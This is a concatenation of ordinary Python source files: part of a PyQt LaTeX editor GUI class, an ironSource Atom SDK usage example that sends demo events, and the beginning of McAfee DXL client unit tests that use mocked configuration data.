"""
# Set the title
self.setWindowTitle(self.title)
# Set the GUI size
self.setGeometry(self.left, self.top, self.width, self.height)
# Show the GUI
self.show()
def show_editor(self):
"""
Launches the Editor GUI, and hides the Settings GUI.
"""
# Update the attribute
self.settings_opened = False
# Hide all existing elements
self.settings_list.hide()
self.editor_group.hide()
self.menu_group.hide()
self.theme_group.hide()
# Show Editor elements
self.menu_bar_instance.show()
self.status_bar_instance.show()
self.editor_box.show()
self.editor_compiled.show()
# Repaint elements
self.resizeEvent()
def show_settings(self):
"""
Launches the Settings GUI, and hides the Editor GUI.
"""
# Update the attribute
self.settings_opened = True
# Hide all existing elements
self.menu_bar_instance.hide()
self.status_bar_instance.hide()
self.editor_box.hide()
self.editor_compiled.hide()
# Reveal Settings elements
self.settings_list.show()
self.settings_list.currentRowChanged['int'].connect(self.change_settings_slide)
# Repaint elements
self.resizeEvent()
def hide_all_settings(self):
"""
Hides all settings elements
"""
self.editor_group.hide()
self.menu_group.hide()
self.theme_group.hide()
def change_settings_slide(self):
"""
Updates the slide of elements in the Settings
GUI to the currently selected list item.
"""
current_row = self.settings_list.currentRow()
self.hide_all_settings()
# Appearance
if current_row == 0:
self.editor_group.show()
self.menu_group.show()
self.theme_group.show()
def close_project(self):
"""
Closes the the currently opened Project file.
"""
# If there are no other files left...
if len(self.projects) == 1:
# Then reload (recreate the current.tex file)
self.restart_app()
return
# Otherwise...
if len(self.projects) > self.projects_index + 1:
# Go to the above index (if there is one)
# Kill the current Project (by index)
self.projects.pop(self.projects_index)
# The Project at this index now will be the one above ours
self.switch_project(self.projects_index)
return
# Otherwise, there must be a Project in the index below us, so go to it
else:
# Kill the current Project (by index)
self.projects.pop(self.projects_index)
# Go to the Project in the index below ours
self.switch_project(self.projects_index - 1)
return
def switch_project(self, new_project_index=0):
"""
Changes the editor to focus on the new selected Project class.
:param new_project_index: The index of self.projects to focus on.
"""
# Set the current project to the new index
self.status_bar_instance.update_status({"Task": "Opening..."})
self.projects_index = new_project_index
self.project = self.projects[self.projects_index]
# Unload all other projects to save memory
for i in range(len(self.projects)):
if i != self.projects_index:
self.projects[i].unload()
# Open it in the editor box
self.editor_box.setPlainText(self.project.open())
# Update the status bar to the current project
self.status_bar_instance.update_status({"Project": self.project.name})
# Update the menu data (Specifically, the Projects menu)
self.status_bar_instance.update_status({"Task": "Updating menu..."})
self.menu_bar_instance.set({
"File": [{"name": "New", "bind": 'Ctrl+N'},
{"name": "Open", "bind": 'Ctrl+O', "func": self.utils.open_file},
{"name": "Save As", "bind": 'Ctrl+Shift+S', "func": self.utils.save_file},
{"name": "Close", "bind": 'Ctrl+W', "func": self.close_project},
{"name": "Reload", "bind": False, "func": self.restart_app},
{"name": "Exit", "bind": False, "func": self.exit_app}],
"Edit": [{"name": "Insert", "bind": 'Ctrl+I'}],
'Options': [{"name": "Settings", "bind": False},
{"name": "Plugins", "bind": False},
{"name": "Packages", "bind": False}],
"View": [{"name": "Fit", "bind": False,
"func": lambda: self.update_fill("fit")},
{"name": "Fill", "bind": False,
"func": lambda: self.update_fill("fill")},
{"name": "Split", "bind": False,
"func": lambda: self.update_fill("split")}],
"Tools": [{"name": "Copy Live", "bind": 'Ctrl+Shift+C',
"func": lambda: self.menu_bar_instance.copy_to_clipboard(self.live_compile)}],
"Projects": [{"name": self.projects[i].name, "bind": False,
"func": lambda state, x=i: self.switch_project(x)} for i in range(len(self.projects))],
"Help": [{"name": "About", "bind": False, "func": lambda: self.error_instance.dialogue(
"../resources/logo.ico",
"About",
"<b><i>ABUELA</i></b>",
"""<i>A Beautiful, Useful, & Elegant LaTeX Application.</i><br><br>
Founded with love by @Xiddoc, @AvivHavivyan, & @RootAtKali.<br><br>
Links:<br>
• <a href="{base_url}">Github Repo</a><br>
• <a href="{base_url}/blob/master/README.md">Documentation</a><br>
• <a href="{base_url}/blob/master/LICENSE">License</a>""".format(
base_url=self.updater_instance.get_url()
))},
{"name": "Settings", "bind": False, "func": self.show_settings},
{"name": "Reset Settings", "bind": False, "func": self.utils.reset_system},
{"name": 'Check for Updates', "bind": False}]
})
self.status_bar_instance.update_status({"Task": "Idling"})
def make_spinbox(self, min_spin=0, max_spin=0, step=1, xPos=0, yPos=0, width=0, height=0, parent=False):
"""
A method to create a list of items, one of which can be selected at a time.
:param step: The step / change that the box will spin by.
:param max_spin: The maximum value the box can spin to.
:param min_spin: The minimum value the box can spin to.
:param parent: The parent widget that the element should be placed into.
:param xPos: The left-top x position of the element.
:param yPos: The left-top y position of the element.
:param width: The width of the element.
:param height: The height of the element.
:return: Returns the created element.
"""
# If there is a parent element, then set it to it
if parent:
spin_widget = QSpinBox(parent)
# Otherwise, parent the list widget to the main window
else:
spin_widget = QSpinBox(self)
# Set the stylesheet
spin_widget.setStyleSheet(self.formatStyle())
# Move the element
spin_widget.move(xPos, yPos)
# Resize it
spin_widget.resize(width, height)
# Update element data
spin_widget.setMinimum(min_spin)
spin_widget.setMaximum(max_spin)
spin_widget.setSingleStep(step)
# Return the element
return spin_widget
def make_text(self, text: str, xPos=0, yPos=0, width=0, height=0, parent=False) -> QLabel:
"""
A function to create a new multi line edit box.
:param text: The text that should be displayed in the text label.
:param parent: The parent widget that the element should be placed into.
:param xPos: The left-top x position of the box.
:param yPos: The left-top y position of the box.
:param width: The width of the box.
:param height: The height of the box.
:return: Returns the created element.
"""
# If there is a parent element, then set it to it
if parent:
text_label = QLabel(parent)
# Otherwise, parent the list widget to the main window
else:
text_label = QLabel(self)
text_label.setText(text)
text_label.setStyleSheet(self.formatStyle())
text_label.move(xPos, yPos)
text_label.resize(width, height)
return text_label
def make_list(self, items: list, xPos=0, yPos=0, width=0, height=0, parent=False):
"""
A method to create a list of items, one of which can be selected at a time.
:param parent: The parent widget that the element should be placed into.
:param items: A list of the names of the items.
:param xPos: The left-top x position of the element.
:param yPos: The left-top y position of the element.
:param width: The width of the element.
:param height: The height of the element.
:return: Returns the created element.
"""
# If there is a parent element, then set it to it
if parent:
list_widget = QListWidget(parent)
# Otherwise, parent the list widget to the main window
else:
list_widget = QListWidget(self)
# Set the stylesheet
list_widget.setStyleSheet(self.formatStyle())
# Move the element
list_widget.move(xPos, yPos)
# Resize it
list_widget.resize(width, height)
# For each item in the items list
for item in items:
# Create an item widget for it and add it to the list widget
current_item = QListWidgetItem()
current_item.setText(item)
list_widget.addItem(current_item)
# Return the element
return list_widget
def make_text_box(self, xPos=0, yPos=0, width=0, height=0):
"""
A function to create a new multi line edit box.
:param xPos: The left-top x position of the box.
:param yPos: The left-top y position of the box.
:param width: The width of the box.
:param height: The height of the box.
:return: Returns the created element.
"""
text_box = QPlainTextEdit(self)
text_box.setStyleSheet(self.formatStyle())
text_box.move(xPos, yPos)
text_box.resize(width, height)
return text_box
def make_pic(self, file_name: str = False, background: str = False, x_pos=0, y_pos=0, width=0, height=0):
"""
A function to create a new picture element.
:param background: The default background color of the picture element. Defaults to no background.
:param file_name: The path to the file to display.
:param x_pos: The left-top x position of the box.
:param y_pos: The left-top y position of the box.
:param width: The width of the box.
:param height: The height of the box.
:return: Returns the created element.
"""
label = QLabel(self)
if file_name:
pixel_map = QPixmap(file_name)
label.setPixmap(pixel_map)
if background:
label.setStyleSheet(
"background-color: {bgColor};".format(
bgColor=self.utils.hex_format(background)
)
)
label.setScaledContents(True)
label.move(x_pos, y_pos)
label.resize(width, height)
return label
def formatStyle(self):
"""
A function that takes the currently loaded theme and formats it into QtCSS.
Returns the QtCSS as a string.
"""
# Initialize the string
formatted_string = str()
# For each element in the GUI data
for element, data in self.theme["GUI"].items():
# Split the identifiers
split_element = element.split("-")
# Add the base element
formatted_string += split_element[0]
# If there is a selector (e.g., item)
if len(split_element) > 1:
formatted_string += "::{selector}".format(
selector=split_element[1]
)
# If there is a case selector (e.g., selected)
if len(split_element) > 2:
formatted_string += ":{case_selector}".format(
case_selector=split_element[2]
)
# Start the element's data segment
formatted_string += " {\n"
# Loop over each attribute
for attrib, value in data.items():
# Format the attribute and its data
formatted_string += "\t{attrib}: {value};\n".format(
attrib=attrib,
# If the value is a hex code, then update
# it to the conventional hex code
value=self.utils.hex_format(value)
)
# End the element's data segment
formatted_string += "}\n\n"
return formatted_string
def update_fill(self, new_fill_type):
"""
Updates the fill type of the screen, used in the menu bar.
:param new_fill_type: The new fill type to update to.
"""
self.settings["live_fill"] = new_fill_type
self.resizeEvent()
def resizeEvent(self, event=None):
"""
Resize and move all elements to their new places, and calculate
their positions based on the new resolution of the GUI window.
"""
# There's gotta be a better way to go about resizing the elements... CSS, maybe?
# Update window size variables
self.width = self.frameGeometry().width()
self.height = self.frameGeometry().height()
# Only update relevant elements to improve efficiency
# Settings elements
if self.settings_opened:
# Calculate margin values
margin_w = int(self.width * 10 / 600)
# Settings list sidebar
self.settings_list.move(
0,
0
)
self.settings_list.resize(
int(
self.width * 0.3
),
self.height
)
# Appearance settings elements
self.theme_group.move(
int(
self.width * 0.3 + margin_w
),
int(
self.height * 10 / 600
)
)
self.theme_group.resize(
int(
self.width * 0.7 - margin_w * 2
),
int(
self.height * 110 / 600
)
)
self.menu_group.move(
int(
self.width * 0.3 + margin_w
),
int(
self.height * 130 / 600
)
)
self.menu_group.resize(
int(
self.width * 0.7 - margin_w * 2
),
int(
self.height * 270 / 600
)
)
self.editor_group.move(
int(
self.width * 0.3 + margin_w
),
int(
self.height * 410 / 600
)
)
self.editor_group.resize(
int(
self.width * 0.7 - margin_w * 2
),
int(
self.height * 150 / 600
)
)
# Grouped elements
self.theme_select_element.move(
int(
self.width * 0.3 + margin_w
),
)
#
# # Create the font selection elements
# self.font_select_element = self.make_list(
# items=font_list,
# parent=self.editor_group
# )
#
# self.menu_font_select_element = self.make_list(
# items=font_list,
# parent=self.editor_group
# )
#
# # Create the spinbox elements
# self.font_size_element = self.make_spinbox(
# min_spin=8,
# max_spin=22,
# step=2,
# parent=self.editor_group
# )
#
# self.cursor_size_element = self.make_spinbox(
# min_spin=1,
# max_spin=10,
# parent=self.editor_group
# )
#
# # Create the text elements
# self.font_size_label_element = self.make_text(
# text="Font Size",
# parent=self.editor_group
# )
#
# self.cursor_size_label_element = self.make_text(
# text="Cursor Size",
# parent=self.editor_group
# )
#
# self.editor_font_element = self.make_text(
# text="Editor Font",
# parent=self.editor_group
# )
#
# # Create the spinbox elements
# self.menu_bar_size_select_element = self.make_spinbox(
# min_spin=6,
# max_spin=14,
# parent=self.menu_group
# )
#
# self.status_bar_size_select_element = self.make_spinbox(
# min_spin=6,
# max_spin=14,
# parent=self.menu_group
# )
#
# self.status_bar_margin_select_element = self.make_spinbox(
# min_spin=1,
# max_spin=20,
# parent=self.menu_group
# )
#
# self.status_bar_spacing_select_element = self.make_spinbox(
# min_spin=1,
# max_spin=10,
# parent=self.menu_group
# )
#
# # Create the text elements
# self.menu_bar_size_element = self.make_text(
# text="Menu Bar Size",
# parent=self.menu_group
# )
#
# self.status_bar_size_element = self.make_text(
# text="Status Bar Size",
# parent=self.menu_group
# )
#
# self.menu_font_element = self.make_text(
# text="Menu Font",
# parent=self.menu_group
# )
#
# self.status_bar_margin_element = self.make_text(
# text="Status Bar Margin",
# parent=self.menu_group
# )
#
# self.status_bar_spacing_element = self.make_text(
# text="Status Bar Spacing",
# parent=self.menu_group
# )
# Editor elements
else:
# Update each element based on the live_fill setting
if self.utils.stringify(self.settings["live_fill"]) in ["fill", "stretch"]:
# Move the edit box
self.editor_box.move(
0,
self.menu_bar_element.height()
)
# Resize the edit box
self.editor_box.resize(
int(self.width / 2),
self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
)
# Move the live-render
self.editor_compiled.move(
int(self.width / 2),
self.menu_bar_element.height()
)
# Resize the live-render
self.editor_compiled.resize(
int(self.width / 2),
self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
)
elif self.utils.stringify(self.settings["live_fill"]) in ["split", "center"]:
# Move the edit box
self.editor_box.move(
0,
self.menu_bar_element.height()
)
# Resize the edit box
self.editor_box.resize(
int(self.width / 2),
self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
)
# Move the live-render
self.editor_compiled.move(
int(
(self.width / 2) +
(((self.width / 2) -
(self.height - self.menu_bar_element.height() -
2.5 * self.status_bar_element.height()) / (2 ** 0.5)) / 2)
),
self.menu_bar_element.height()
)
# Resize the live-render
self.editor_compiled.resize(
int((
self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
) / (
2 ** 0.5
)),
self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
)
else:
# Move the edit box
self.editor_box.move(
0,
self.menu_bar_element.height()
)
# Resize the edit box
self.editor_box.resize(
int(
self.width -
(
self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
) / (
2 ** 0.5
)
),
self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
)
# Move the live-render
self.editor_compiled.move(
int(
self.width - (
self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
) / (
2 ** 0.5
)
),
self.menu_bar_element.height())
# Resize the live-render
self.editor_compiled.resize(
int(
(
self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
) / (
2 ** 0.5
)
),
self.height - self.menu_bar_element.height() - 2.5 * self.status_bar_element.height()
)
def set_tab_order(self, *tab_order):
"""
A method to set the order of how pressing the
'TAB' key affects the selected elements.
:param tab_order: A list of the elements, the list order is the order that the tab key will pass by.
"""
# For each index in the tab list (starting from the index 1)
for i in range(1, len(tab_order)):
# Connect the previous tab to the current tab
self.setTabOrder(tab_order[i - 1], tab_order[i])
def restart_app(self):
"""
Restarts the application.
The actual method only terminates, however
the termination code is synchronized with
main.py so that it will reopen after termination.
"""
QCoreApplication.exit(self.restart_code)
@staticmethod
def exit_app():
"""
Exits the application with no restart.
"""
QCoreApplication.exit()
|
example.py | # -*- coding: utf-8 -*-
import json
import random
from ironsource.atom.ironsource_atom import IronSourceAtom
from ironsource.atom.ironsource_atom_tracker import IronSourceAtomTracker
import time
from threading import Thread
from threading import Lock
if __name__ == "__main__":
stream = "YOUR_TARGET.public.atom_demo_events"
auth_key = "YOUR_KEY"
api_ = IronSourceAtom(is_debug=False, endpoint="https://track.atom-data.io/")
# put_event() GET example
print ("==== GET REQUEST TO ATOM WITH JSON DUMPS ====")
data_get = {"id": 1337, "event_name": "PYTHON_SDK_GET_EXAMPLE_STRING", "string_value": str(random.random())}
response_get = api_.put_event(stream=stream, data=json.dumps(data_get), method="get", auth_key=auth_key)
print ("GET Response data: " + str(response_get.data) + "; error: " + str(response_get.error) +
"; status: " + str(response_get.status))
print ("\n==== GET REQUEST TO ATOM WITH DICT ====")
data_get = {"id": 1338, "event_name": "PYTHON_SDK_GET_EXAMPLE_DICT", "string_value": str(random.random())}
response_get = api_.put_event(stream=stream, data=data_get, method="get", auth_key=auth_key)
print ("GET Response data: " + str(response_get.data) + "; error: " + str(response_get.error) +
"; status: " + str(response_get.status))
# put_event() POST example
print ("\n==== POST REQUEST TO ATOM WITH JSON DUMPS ====")
data_post = {"id": 1339, "event_name": "PYTHON_SDK_POST_EXAMPLE_STRING", "string_value": str(random.random())}
response_post = api_.put_event(stream=stream, data=json.dumps(data_post), auth_key=auth_key)
print ("POST Response data: " + str(response_post.data) + "; error: " + str(response_post.error) +
"; status: " + str(response_post.status))
print ("\n==== POST REQUEST TO ATOM WITH DICT ====")
data_post = {"id": 1440, "event_name": "PYTHON_SDK_POST_EXAMPLE_DICT", "string_value": str(random.random())}
response_post = api_.put_event(stream=stream, data=data_post, auth_key=auth_key)
print ("POST Response data: " + str(response_post.data) + "; error: " + str(response_post.error) +
"; status: " + str(response_post.status))
# put_events example
print ("\n==== BATCH POST REQUEST TO ATOM ====")
data_post = [{"id": 1441, "event_name": "PYTHON_SDK_BATCH_POST_EXAMPLE", "string_value": str(random.random())},
{"id": 1442, "event_name": "PYTHON_SDK_BATCH_POST_EXAMPLE", "string_value": str(random.random())}]
response_post = api_.put_events(stream=stream, data=data_post, auth_key=auth_key)
print ("POST Response data: " + str(response_post.data) + "; error: " + str(response_post.error) +
"; status: " + str(response_post.status))
# Tracker example
print ("\n==== TESTING ATOM TRACKER ====")
def callback_func(timestmap, status, msg, data, stream):
# Tracker callback function example
print("[EXAMPLE CALLBACK FUNCTION] timestamp: {}, status: {} message: {}".format(timestmap, status, msg))
# endpoint = "http://127.0.0.1:3000/"
endpoint = "http://track.atom-data.io/"
api_tracker = IronSourceAtomTracker(flush_interval=10000,
callback=callback_func,
batch_bytes_size=64 * 1024,
batch_size=64,
is_debug=True,
debug_to_file=True,
debug_file_path="./",
endpoint=endpoint)
class ThreadClass:
def __init__(self):
self._call_index = 0
self._thread_lock = Lock()
def thread_worker(self, args):
print("[EXAMPLE] Thread {} started".format(args))
while True:
with self._thread_lock:
self._call_index += 1
data_track = {"id": self._call_index, "event_name": "PYTHON_SDK_TRACKER_EXAMPLE",
"string_value": str(random.random()),
"non_ascii": "Lista de leitura, novos recursos de privacidade e segurança, "
"além de mais velocidade Esses são os atrativos do novo Safari"}
# exit after 100
if self._call_index >= 100:
return
else:
# Track every 10th event with delay
if self._call_index % 10 == 0:
time.sleep(1)
print("[EXAMPLE] Tracking Data")
api_tracker.track(stream=stream, data=data_track, auth_key=auth_key)
threads_array = []
thread_instance = ThreadClass()
for index in range(0, 10):
thread_index = index
thread = Thread(target=thread_instance.thread_worker, args=[thread_index])
threads_array.append(thread)
for thread in threads_array:
thread.start()
for thread in threads_array:
thread.join()
print ("Finished all example methods.")
time.sleep(1000000)
|
test_dxlclient.py | # -*- coding: utf-8 -*-
################################################################################
# Copyright (c) 2018 McAfee LLC - All Rights Reserved.
################################################################################
"""
Test cases for the DxlClient class
"""
# Run with python -m unittest dxlclient.test.test_dxlclient
from __future__ import absolute_import
import io
from textwrap import dedent
import time
import threading
import unittest
# pylint: disable=wrong-import-position
import paho.mqtt.client as mqtt
from nose.plugins.attrib import attr
from parameterized import parameterized
from mock import Mock, patch
import dxlclient._global_settings
from dxlclient import Request
from dxlclient import Response
from dxlclient import Event
from dxlclient import ErrorResponse
from dxlclient import DxlClient
from dxlclient import DxlClientConfig
from dxlclient import Broker
from dxlclient import UuidGenerator
from dxlclient import EventCallback
from dxlclient import RequestCallback
from dxlclient import ResponseCallback
from dxlclient import DxlException, WaitTimeoutException
# pylint: disable=wildcard-import, unused-wildcard-import
from dxlclient._global_settings import *
from .base_test import BaseClientTest, builtins
# pylint: disable=missing-docstring
CONFIG_DATA_NO_CERTS_SECTION = """
[no_certs]
BrokerCertChain=certchain.pem
CertFile=certfile.pem
PrivateKey=privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de=22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_CA_OPTION = """
[Certs]
CertFile=certfile.pem
PrivateKey=privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de=22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_CERT_OPTION = """
[Certs]
BrokerCertChain=certchain.pem
PrivateKey=privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de=22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_PK_OPTION = """
[Certs]
BrokerCertChain=certchain.pem
CertFile=certfile.pem
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de=22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_BROKERS_SECTION = """
[Certs]
BrokerCertChain=certchain.pem
CertFile=certfile.pem
PrivateKey=privatekey.pk
22cdcace-6e8f-11e5-29c0-005056aa56de=22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_BROKERS_OPTION = """
[Certs]
BrokerCertChain=certchain.pem
CertFile=certfile.pem
PrivateKey=privatekey.pk
[Brokers]
"""
class DxlClientConfigTest(unittest.TestCase):
@parameterized.expand([
(None,),
("",)
])
def test_config_throws_value_error_for_empty_ca_bundle(self, ca_bundle):
self.assertRaises(ValueError, DxlClientConfig, broker_ca_bundle=ca_bundle,
cert_file=get_cert_file_pem(), private_key=get_dxl_private_key(), brokers=[])
@parameterized.expand([
(None,),
("",)
])
def test_config_throws_value_error_for_empty_cert_file(self, cert_file):
self.assertRaises(ValueError, DxlClientConfig,
cert_file=cert_file, broker_ca_bundle=get_ca_bundle_pem(), private_key=get_dxl_private_key(),
brokers=[])
def test_get_fastest_broker_gets_the_fastest(self):
semaphore = threading.Semaphore(0)
# Mock brokers connect speed
fast_broker = Mock()
slow_broker = Mock()
def connect_to_broker_slow():
semaphore.acquire()
time.sleep(0.1)
def connect_to_broker_fast():
semaphore.release()
slow_broker._connect_to_broker = connect_to_broker_slow
fast_broker._connect_to_broker = connect_to_broker_fast
# Create config and add brokers
config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
config.brokers.append(fast_broker)
config.brokers.append(slow_broker)
# Check that the returned is the fastest
self.assertEqual(config._get_fastest_broker(), fast_broker)
def test_get_sorted_broker_list_returns_empty_when_no_brokers(self):
config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
self.assertEqual(config._get_sorted_broker_list(), [])
def test_get_sorted_broker_list_returns_all_brokers(self):
# Create config
config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
# Create mocked brokers
broker1 = Broker('b1host')
broker2 = Broker('b2host')
broker1._connect_to_broker = broker2._connect_to_broker = Mock(
return_value=True)
# Add them to config
config.brokers.append(broker1)
config.brokers.append(broker2)
# Get all brokers
broker_list = config._get_sorted_broker_list()
# Check all brokers are in the list
self.assertTrue(broker1 in broker_list)
self.assertTrue(broker2 in broker_list)
def test_set_config_from_file_generates_dxl_config(self):
read_data = """
[Certs]
BrokerCertChain=certchain.pem
CertFile=certfile.pem
PrivateKey=privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de=22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
with patch.object(builtins, 'open',
return_value=io.BytesIO(
dedent(read_data).encode())) as mock_open, \
patch.object(os.path, 'isfile', return_value=True):
client_config = DxlClientConfig.create_dxl_config_from_file("mock_file")
self.assertEqual(client_config.cert_file, "certfile.pem")
self.assertEqual(client_config.broker_ca_bundle, "certchain.pem")
self.assertEqual(client_config.private_key, "privatekey.pk")
broker = client_config.brokers[0]
self.assertEqual(broker.host_name, "dxl-broker-1")
self.assertEqual(broker.ip_address, "10.218.73.206")
self.assertEqual(broker.port, 8883)
self.assertEqual(broker.unique_id, "22cdcace-6e8f-11e5-29c0-005056aa56de")
mock_open.assert_called_with("mock_file", "rb")
def test_set_config_wrong_file_raises_exception(self):
with self.assertRaises(Exception):
DxlClientConfig.create_dxl_config_from_file("this_file_doesnt_exist.cfg")
@parameterized.expand([
(CONFIG_DATA_NO_CERTS_SECTION,),
(CONFIG_DATA_NO_CA_OPTION,),
(CONFIG_DATA_NO_CERT_OPTION,),
(CONFIG_DATA_NO_PK_OPTION,),
])
def test_missing_certs_raises_exception(self, read_data):
with patch.object(builtins, 'open',
return_value=io.BytesIO(
dedent(read_data).encode())), \
patch.object(os.path, 'isfile', return_value=True):
with self.assertRaises(ValueError):
DxlClientConfig.create_dxl_config_from_file("mock_file.cfg")
@parameterized.expand([
(CONFIG_DATA_NO_BROKERS_SECTION,),
(CONFIG_DATA_NO_BROKERS_OPTION,),
])
def test_missing_brokers_doesnt_raise_exceptions(self, read_data):
with patch.object(builtins, 'open',
return_value=io.BytesIO(
dedent(read_data).encode())), \
patch.object(os.path, 'isfile', return_value=True):
client_config = DxlClientConfig.create_dxl_config_from_file(
"mock_file.cfg")
self.assertEqual(len(client_config.brokers), 0)
class CapturedBytesIO(io.BytesIO):
def __init__(self):
super(DxlClientConfigTest.CapturedBytesIO, self).__init__()
self._bytes_captured = None
@property
def bytes_captured(self):
return self._bytes_captured
def write(self, bytes_to_write):
self._bytes_captured = bytes_to_write
def test_write_in_memory_config(self):
expected_data = os.linesep.join([
"[Certs]",
"BrokerCertChain = mycabundle.pem",
"CertFile = mycertfile.pem",
"PrivateKey = myprivatekey.pem",
"{}[Brokers]".format(os.linesep),
"myid1 = myid1;8001;myhost1;10.10.100.1",
"myid2 = myid2;8002;myhost2;10.10.100.2{}".format(os.linesep)])
byte_stream = self.CapturedBytesIO()
with patch.object(builtins, 'open',
return_value=byte_stream) as mock_open:
config = DxlClientConfig(
"mycabundle.pem",
"mycertfile.pem",
"myprivatekey.pem",
[Broker("myhost1", "myid1", "10.10.100.1",
8001),
Broker("myhost2", "myid2", "10.10.100.2",
8002)])
config.write("myfile.txt")
self.assertEqual(expected_data.encode(), byte_stream.bytes_captured)
mock_open.assert_called_with("myfile.txt", "wb")
def test_write_modified_config(self):
initial_data = os.linesep.join([
"# mycerts",
"[Certs]",
"BrokerCertChain = abundle.crt",
"CertFile = acertfile.crt",
"# pk file",
"PrivateKey = akey.key",
"{}[Brokers]".format(os.linesep),
"# broker 7",
"myid7 = myid7;8007;myhost7;10.10.100.7",
"# broker 8",
"myid8 = myid8;8008;myhost8;10.10.100.8{}".format(os.linesep)])
expected_data_after_mods = os.linesep.join([
"# mycerts",
"[Certs]",
"BrokerCertChain = newbundle.pem",
"CertFile = acertfile.crt",
"# pk file",
"PrivateKey = newkey.pem",
"{}[Brokers]".format(os.linesep),
"# broker 8",
"myid8 = myid8;8008;myhost8;10.10.100.8",
"myid9 = myid9;8009;myhost9;10.10.100.9{}".format(os.linesep)])
with patch.object(builtins, 'open',
return_value=io.BytesIO(initial_data.encode())), \
patch.object(os.path, 'isfile', return_value=True):
config = DxlClientConfig.create_dxl_config_from_file(
"mock_file.cfg")
del config.brokers[0]
config.broker_ca_bundle = "newbundle.pem"
config.private_key = "newkey.pem"
config.brokers.append(Broker("myhost9",
"myid9",
"10.10.100.9",
8009))
byte_stream = self.CapturedBytesIO()
with patch.object(builtins, 'open',
return_value=byte_stream) as mock_open:
config.write("newfile.txt")
self.assertEqual(expected_data_after_mods.encode(),
byte_stream.bytes_captured)
mock_open.assert_called_with("newfile.txt", "wb")
class DxlClientTest(unittest.TestCase):
def setUp(self):
self.config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
mqtt_client_patch = patch('paho.mqtt.client.Client')
mqtt_client_patch.start()
self.client = DxlClient(self.config)
self.client._request_manager.wait_for_response = Mock(return_value=Response(request=None))
self.test_channel = '/test/channel'
def tearDown(self):
self.client._connected = False
self.client.destroy()
patch.stopall()
def test_client_raises_exception_on_connect_when_already_connecting(self):
self.client._client.connect.side_effect = Exception("An exception!")
self.client._thread = threading.Thread(target=None)
self.assertEqual(self.client.connected, False)
with self.assertRaises(DxlException):
self.client.connect()
self.client._thread = None
def test_client_raises_exception_on_connect_when_already_connected(self):
self.client._client.connect.side_effect = Exception("An exception!")
self.client._connected = True
with self.assertRaises(DxlException):
self.client.connect()
# The following test is too slow
def test_client_disconnect_doesnt_raises_exception_on_disconnect_when_disconnected(self):
self.assertEqual(self.client.connected, False)
self.client.disconnect()
self.client.disconnect()
@parameterized.expand([
# (connect + retries) * 2 = connect_count
(0, 2),
(1, 4),
(2, 6),
])
def test_client_retries_defines_how_many_times_the_client_retries_connection(self, retries, connect_count):
# Client wont' connect ;)
self.client._client.connect = Mock(side_effect=Exception('Could not connect'))
# No delay between retries (faster unit tests)
self.client.config.reconnect_delay = 0
self.client._wait_for_policy_delay = 0
broker = Broker(host_name='localhost')
broker._parse(UuidGenerator.generate_id_as_string() + ";9999;localhost;127.0.0.1")
self.client.config.brokers = [broker]
self.client.config.connect_retries = retries
with self.assertRaises(DxlException):
self.client.connect()
self.assertEqual(self.client._client.connect.call_count, connect_count)
def test_client_subscribe_adds_subscription_when_not_connected(self):
self.client._client.subscribe = Mock(return_value=None)
self.assertFalse(self.client.connected)
self.client.subscribe(self.test_channel)
self.assertTrue(self.test_channel in self.client.subscriptions)
self.assertEqual(self.client._client.subscribe.call_count, 0)
def test_client_unsubscribe_removes_subscription_when_not_connected(self):
self.client._client.unsubscribe = Mock(return_value=None)
self.assertFalse(self.client.connected)
# Add subscription
self.client.subscribe(self.test_channel)
self.assertTrue(self.test_channel in self.client.subscriptions)
# Remove subscription
self.client.unsubscribe(self.test_channel)
self.assertFalse(self.test_channel in self.client.subscriptions)
def test_client_subscribe_doesnt_add_twice_same_channel(self):
# Mock client.subscribe and is_connected
self.client._client.subscribe = Mock(
return_value=(mqtt.MQTT_ERR_SUCCESS, 2))
self.client._connected = Mock(return_value=True)
self.client._wait_for_packet_ack = Mock(return_value=None)
# We always have the default (myself) channel
self.assertEqual(len(self.client.subscriptions), 1)
self.client.subscribe(self.test_channel)
self.assertEqual(len(self.client.subscriptions), 2)
self.client.subscribe(self.test_channel)
self.assertEqual(len(self.client.subscriptions), 2)
self.assertEqual(self.client._client.subscribe.call_count, 1)
def test_client_handle_message_with_event_calls_event_callback(self):
event_callback = EventCallback()
event_callback.on_event = Mock()
self.client.add_event_callback(self.test_channel, event_callback)
# Create and process Event
evt = Event(destination_topic=self.test_channel)._to_bytes()
self.client._handle_message(self.test_channel, evt)
# Check that callback was called
